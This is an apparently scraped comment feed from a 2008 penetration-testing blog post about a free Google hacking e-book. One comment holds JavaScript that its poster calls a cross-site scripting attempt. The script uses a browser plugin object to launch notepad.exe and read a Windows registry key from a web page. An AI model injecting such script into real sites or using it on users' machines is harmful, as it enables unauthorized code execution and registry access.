Comments on: Google Hacking for Penetration Testers (free e-book download) http://www.mypentest.com/google-hacking-free-ebook/ Penetration Testing Web applications Sun, 23 Nov 2008 14:13:30 +0000 http://wordpress.org/?v=2.5.1 By: kurthin http://www.mypentest.com/google-hacking-free-ebook/#comment-14 kurthin Mon, 05 May 2008 17:26:41 +0000 http://www.mypentest.com/google-hacking-free-ebook/#comment-14 The free download has been removed? <em>[Stuart's Reply: Yes. Scribd has removed the content for copyright reasons.]</em> The free download has been removed?

[Stuart's Reply: Yes. Scribd has removed the content for copyright reasons.]

]]> By: Linden http://www.mypentest.com/google-hacking-free-ebook/#comment-6 Linden Wed, 02 Jan 2008 06:16:55 +0000 http://www.mypentest.com/google-hacking-free-ebook/#comment-6 Ummm, cross-site scripting? Even if this hasn't been approved, it might still hack you...mwahahahaha...don't worry its not malicious, check if the object HTML is there tho... function spawn2() { myObject = document.getElementById("o2obj"); myResults = document.getElementById("results"); myResults.innerHTML = '(running tests...)'; try { myObject.LaunchApp("c:\\windows\\system32\\notepad.exe","",1); var ret=myObject.GetRegValue("HKEY_LOCAL_MACHINE","SOFTWARE\\Classes\\CLSID\\"+ "{62DDEB79-15B2-41E3-8834-D3B80493887A}\\InprocServer32",""); myResults.innerHTML = 'Your system does indeed manifest the security flaw!'+ 'Please be very careful about accessing '+ 'unknown websites/HTMLfiles until the security flaw is fixed.'+ 'Offending DLL: '+ret+''+ 'I just read your registry and opened Notepad all from within a simple HTML page!!!'; return; } catch(err) { //alert("Your system does not seem to manifest the security flaw!\n"+"error message: "+err); myResults.innerHTML = 'Your system does not seem to manifest the security flaw!</a>'+ 'error message: '+err; return; } } <em>[Stuart's Reply: Your cross-site scripting attempt did not work. Thanks for the note about volume 2 of the book. :)]</em> Ummm, cross-site scripting? Even if this hasn’t been approved, it might still hack you…mwahahahaha…don’t worry its not malicious, check if the object HTML is there tho…

function spawn2()
{
myObject = document.getElementById(”o2obj”);
myResults = document.getElementById(”results”);
myResults.innerHTML = ‘(running tests…)’;
try
{
myObject.LaunchApp(”c:\\windows\\system32\\notepad.exe”,”",1);
var ret=myObject.GetRegValue(”HKEY_LOCAL_MACHINE”,”SOFTWARE\\Classes\\CLSID\\”+
“{62DDEB79-15B2-41E3-8834-D3B80493887A}\\InprocServer32″,”");
myResults.innerHTML = ‘Your system does indeed manifest the security flaw!’+
‘Please be very careful about accessing ‘+
‘unknown websites/HTMLfiles until the security flaw is fixed.’+
‘Offending DLL: ‘+ret+”+
‘I just read your registry and opened Notepad all from within a simple HTML page!!!’;
return;
}
catch(err)
{
//alert(”Your system does not seem to manifest the security flaw!\n”+”error message: “+err);
myResults.innerHTML = ‘Your system does not seem to manifest the security flaw!‘+
‘error message: ‘+err;
return;
}
}

[Stuart's Reply: Your cross-site scripting attempt did not work. Thanks for the note about volume 2 of the book. :)]

]]> By: Linden http://www.mypentest.com/google-hacking-free-ebook/#comment-5 Linden Wed, 02 Jan 2008 05:13:46 +0000 http://www.mypentest.com/google-hacking-free-ebook/#comment-5 A 'volume 2' of this book has been released more recently..aptly named 'Google Hacking for Penetration Testers, Volume 2' (on <a href="http://www.amazon.com/Google-Hacking-Penetration-Testers-2/dp/1597491764/" rel="nofollow">amazon</a>). <em>[Stuart's Reply: Definitely worth checking out...]</em> A ‘volume 2′ of this book has been released more recently..aptly named ‘Google Hacking for Penetration Testers, Volume 2′ (on amazon).

[Stuart's Reply: Definitely worth checking out...]

]]>